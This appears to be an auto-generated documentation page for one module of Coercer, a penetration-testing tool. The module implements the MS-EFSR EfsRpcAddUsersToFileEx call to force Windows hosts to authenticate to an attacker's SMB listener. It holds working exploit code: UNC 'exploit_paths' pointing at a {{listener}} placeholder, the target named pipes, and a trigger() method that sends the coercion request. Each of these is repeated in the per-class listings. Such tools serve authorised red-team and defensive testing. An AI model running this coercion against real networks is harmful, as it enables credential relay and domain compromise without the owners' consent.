coercer.methods.MS_EFSR.EfsRpcAddUsersToFileEx

  1#!/usr/bin/env python3
  2# -*- coding: utf-8 -*-
  3# File name          : EfsRpcAddUsersToFileEx.py
  4# Author             : Podalirius (@podalirius_)
  5# Fixed by           : XiaoliChan
  6# Date created       : 16 Sep 2022
  7# Updated in         : 18 Mar 2023
  8
  9
 10from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
 11from coercer.network.DCERPCSessionError import DCERPCSessionError
 12from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
 13from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID, NDRPOINTERNULL
 14
 15class EFS_RPC_BLOB(NDRSTRUCT):
 16    structure = (
 17        ('Data', DWORD),
 18        ('cbData', PCHAR),
 19    )
 20
 21class EFS_HASH_BLOB(NDRSTRUCT):
 22    structure = (
 23        ('Data', DWORD),
 24        ('cbData', PCHAR),
 25    )
 26
 27class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
 28    structure = (
 29        ('Lenght', DWORD),
 30        ('SID', RPC_SID),
 31        ('Hash', EFS_HASH_BLOB),
 32        ('Display', LPWSTR),
 33    ) 
 34
 35class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
 36    structure = (
 37        ('nUsers', DWORD),
 38        ('Users', ENCRYPTION_CERTIFICATE_HASH),
 39    )
 40
 41
 42class _EfsRpcAddUsersToFileEx(NDRCALL):
 43    opnum = 15
 44    structure = (
 45        ('dwFlags', DWORD),    # Type: DWORD
 46        # Accroding to this page: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/d36df703-edc9-4482-87b7-d05c7783d65e
 47        # Reserved must be set to NULL 
 48        ('Reserved', NDRPOINTERNULL),   # Type: NDRPOINTERNULL *
 49        ('FileName', WSTR),    # Type: wchar_t *
 50        ('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST),  # Type: ENCRYPTION_CERTIFICATE_LIST *
 51    )
 52
 53
 54class _EfsRpcAddUsersToFileExResponse(NDRCALL):
 55    structure = ()
 56
 57
 58class EfsRpcAddUsersToFileEx(MSPROTOCOLRPCCALL):
 59    """
 60    
 61    
 62    https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/d36df703-edc9-4482-87b7-d05c7783d65e
 63    """
 64
 65    exploit_paths = [
 66        ("smb", '\\\\{{listener}}\\Share\\file.txt\x00'),
 67        ("smb", '\\\\{{listener}}\\Share\\\x00'),
 68        ("smb", '\\\\{{listener}}\\Share\x00'),
 69    ]
 70
 71    access = {
 72        "ncan_np": [
 73            {
 74                "namedpipe": r"\PIPE\efsrpc",
 75                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 76                "version": "1.0"
 77            },
 78            {
 79                "namedpipe": r"\PIPE\lsarpc",
 80                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 81                "version": "1.0"
 82            },
 83            {
 84                "namedpipe": r"\PIPE\samr",
 85                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 86                "version": "1.0"
 87            },
 88            {
 89                "namedpipe": r"\PIPE\lsass",
 90                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 91                "version": "1.0"
 92            },
 93            {
 94                "namedpipe": r"\PIPE\netlogon",
 95                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 96                "version": "1.0"
 97            },
 98        ],
 99        "ncacn_ip_tcp": [
100            {
101                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
102                "version": "1.0"
103            },
104            {
105                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
106                "version": "1.0"
107            }
108        ]
109    }
110
111    protocol = {
112        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
113        "shortname": "MS-EFSR"
114    }
115
116    function = {
117        "name": "EfsRpcAddUsersToFileEx",
118        "opnum": 15,
119        "vulnerable_arguments": ["FileName"]
120    }
121
122    def trigger(self, dcerpc_session, target):
123        if dcerpc_session is not None:
124            try:
125                request = _EfsRpcAddUsersToFileEx()
126                # dwFlags: This MUST be set to a bitwise OR of 0 or more of the following flags.
127                # The descriptions of the flags are specified in the following table.
128                # If the EFSRPC_ADDUSERFLAG_REPLACE_DDF flag is used, then the EncryptionCertificates
129                # parameter MUST contain exactly one certificate.
130                # EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE don't need to supply certificate
131                EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE = 0x00000002
132                EFSRPC_ADDUSERFLAG_REPLACE_DDF = 0x00000004
133                request['dwFlags'] = EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE
134                request['FileName'] = self.path
135                resp = dcerpc_session.request(request)
136                return ""
137            except Exception as err:
138                return err
139        else:
140            print("[!] Error: dce is None, you must call connect() first.")
141            return None
class EFS_RPC_BLOB(impacket.dcerpc.v5.ndr.NDRSTRUCT):
16class EFS_RPC_BLOB(NDRSTRUCT):
17    structure = (
18        ('Data', DWORD),
19        ('cbData', PCHAR),
20    )

This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type

structure = (('Data', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('cbData', <class 'impacket.dcerpc.v5.dtypes.PCHAR'>))
Inherited Members
impacket.dcerpc.v5.ndr.NDR
NDR
referent
commonHdr
commonHdr64
structure64
align
item
fields
changeTransferSyntax
getDataLen
isNDR
dumpRaw
dump
calculatePad
pack
unpack
impacket.dcerpc.v5.ndr.NDRSTRUCT
getData
fromString
getAlignment
impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
isPointer
isUnion
getDataReferents
getDataReferent
calcPackSize
getArrayMaximumSize
getArraySize
fromStringReferents
fromStringReferent
calcUnPackSize
class EFS_HASH_BLOB(impacket.dcerpc.v5.ndr.NDRSTRUCT):
22class EFS_HASH_BLOB(NDRSTRUCT):
23    structure = (
24        ('Data', DWORD),
25        ('cbData', PCHAR),
26    )

This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type

structure = (('Data', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('cbData', <class 'impacket.dcerpc.v5.dtypes.PCHAR'>))
Inherited Members
impacket.dcerpc.v5.ndr.NDR
NDR
referent
commonHdr
commonHdr64
structure64
align
item
fields
changeTransferSyntax
getDataLen
isNDR
dumpRaw
dump
calculatePad
pack
unpack
impacket.dcerpc.v5.ndr.NDRSTRUCT
getData
fromString
getAlignment
impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
isPointer
isUnion
getDataReferents
getDataReferent
calcPackSize
getArrayMaximumSize
getArraySize
fromStringReferents
fromStringReferent
calcUnPackSize
class ENCRYPTION_CERTIFICATE_HASH(impacket.dcerpc.v5.ndr.NDRSTRUCT):
28class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
29    structure = (
30        ('Lenght', DWORD),
31        ('SID', RPC_SID),
32        ('Hash', EFS_HASH_BLOB),
33        ('Display', LPWSTR),
34    ) 

This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type

structure = (('Lenght', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('SID', <class 'impacket.dcerpc.v5.dtypes.RPC_SID'>), ('Hash', <class 'EFS_HASH_BLOB'>), ('Display', <class 'impacket.dcerpc.v5.dtypes.LPWSTR'>))
Inherited Members
impacket.dcerpc.v5.ndr.NDR
NDR
referent
commonHdr
commonHdr64
structure64
align
item
fields
changeTransferSyntax
getDataLen
isNDR
dumpRaw
dump
calculatePad
pack
unpack
impacket.dcerpc.v5.ndr.NDRSTRUCT
getData
fromString
getAlignment
impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
isPointer
isUnion
getDataReferents
getDataReferent
calcPackSize
getArrayMaximumSize
getArraySize
fromStringReferents
fromStringReferent
calcUnPackSize
class ENCRYPTION_CERTIFICATE_LIST(impacket.dcerpc.v5.ndr.NDRSTRUCT):
36class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
37    structure = (
38        ('nUsers', DWORD),
39        ('Users', ENCRYPTION_CERTIFICATE_HASH),
40    )

This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type

structure = (('nUsers', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('Users', <class 'ENCRYPTION_CERTIFICATE_HASH'>))
Inherited Members
impacket.dcerpc.v5.ndr.NDR
NDR
referent
commonHdr
commonHdr64
structure64
align
item
fields
changeTransferSyntax
getDataLen
isNDR
dumpRaw
dump
calculatePad
pack
unpack
impacket.dcerpc.v5.ndr.NDRSTRUCT
getData
fromString
getAlignment
impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
isPointer
isUnion
getDataReferents
getDataReferent
calcPackSize
getArrayMaximumSize
getArraySize
fromStringReferents
fromStringReferent
calcUnPackSize
class EfsRpcAddUsersToFileEx(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
 59class EfsRpcAddUsersToFileEx(MSPROTOCOLRPCCALL):
 60    """
 61    
 62    
 63    https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/d36df703-edc9-4482-87b7-d05c7783d65e
 64    """
 65
 66    exploit_paths = [
 67        ("smb", '\\\\{{listener}}\\Share\\file.txt\x00'),
 68        ("smb", '\\\\{{listener}}\\Share\\\x00'),
 69        ("smb", '\\\\{{listener}}\\Share\x00'),
 70    ]
 71
 72    access = {
 73        "ncan_np": [
 74            {
 75                "namedpipe": r"\PIPE\efsrpc",
 76                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 77                "version": "1.0"
 78            },
 79            {
 80                "namedpipe": r"\PIPE\lsarpc",
 81                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 82                "version": "1.0"
 83            },
 84            {
 85                "namedpipe": r"\PIPE\samr",
 86                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 87                "version": "1.0"
 88            },
 89            {
 90                "namedpipe": r"\PIPE\lsass",
 91                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 92                "version": "1.0"
 93            },
 94            {
 95                "namedpipe": r"\PIPE\netlogon",
 96                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 97                "version": "1.0"
 98            },
 99        ],
100        "ncacn_ip_tcp": [
101            {
102                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
103                "version": "1.0"
104            },
105            {
106                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
107                "version": "1.0"
108            }
109        ]
110    }
111
112    protocol = {
113        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
114        "shortname": "MS-EFSR"
115    }
116
117    function = {
118        "name": "EfsRpcAddUsersToFileEx",
119        "opnum": 15,
120        "vulnerable_arguments": ["FileName"]
121    }
122
123    def trigger(self, dcerpc_session, target):
124        if dcerpc_session is not None:
125            try:
126                request = _EfsRpcAddUsersToFileEx()
127                # dwFlags: This MUST be set to a bitwise OR of 0 or more of the following flags.
128                # The descriptions of the flags are specified in the following table.
129                # If the EFSRPC_ADDUSERFLAG_REPLACE_DDF flag is used, then the EncryptionCertificates
130                # parameter MUST contain exactly one certificate.
131                # EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE don't need to supply certificate
132                EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE = 0x00000002
133                EFSRPC_ADDUSERFLAG_REPLACE_DDF = 0x00000004
134                request['dwFlags'] = EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE
135                request['FileName'] = self.path
136                resp = dcerpc_session.request(request)
137                return ""
138            except Exception as err:
139                return err
140        else:
141            print("[!] Error: dce is None, you must call connect() first.")
142            return None
exploit_paths = [('smb', '\\\\{{listener}}\\Share\\file.txt\x00'), ('smb', '\\\\{{listener}}\\Share\\\x00'), ('smb', '\\\\{{listener}}\\Share\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol = {'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
function = {'name': 'EfsRpcAddUsersToFileEx', 'opnum': 15, 'vulnerable_arguments': ['FileName']}
def trigger(self, dcerpc_session, target):
123    def trigger(self, dcerpc_session, target):
124        if dcerpc_session is not None:
125            try:
126                request = _EfsRpcAddUsersToFileEx()
127                # dwFlags: This MUST be set to a bitwise OR of 0 or more of the following flags.
128                # The descriptions of the flags are specified in the following table.
129                # If the EFSRPC_ADDUSERFLAG_REPLACE_DDF flag is used, then the EncryptionCertificates
130                # parameter MUST contain exactly one certificate.
131                # EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE don't need to supply certificate
132                EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE = 0x00000002
133                EFSRPC_ADDUSERFLAG_REPLACE_DDF = 0x00000004
134                request['dwFlags'] = EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE
135                request['FileName'] = self.path
136                resp = dcerpc_session.request(request)
137                return ""
138            except Exception as err:
139                return err
140        else:
141            print("[!] Error: dce is None, you must call connect() first.")
142            return None